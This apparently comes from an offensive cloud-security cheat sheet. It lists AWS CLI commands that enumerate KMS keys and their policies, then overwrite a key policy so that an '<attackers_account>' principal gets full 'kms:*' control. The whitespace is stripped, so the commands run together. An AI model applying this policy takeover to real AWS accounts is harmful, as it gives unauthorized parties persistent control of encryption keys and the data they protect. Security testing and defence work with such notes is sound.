awskmslist-keysawskmslist-key-policies--key-id<id># Although only 1 max per keyawskmsget-key-policy--key-id<id>--policy-name<policy_name># AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
awskmsput-key-policy--key-id<id>--policy-name<policy_name>--policyfile:///tmp/policy.json
policy.json:
{"Version":"2012-10-17","Id":"key-consolepolicy-3","Statement": [{"Sid":"Enable IAM User Permissions","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::<origin_account>:root"},"Action":"kms:*","Resource":"*"},{"Sid":"Allow all use","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::<attackers_account>:root"},"Action": [ "kms:*" ],"Resource":"*"}]}
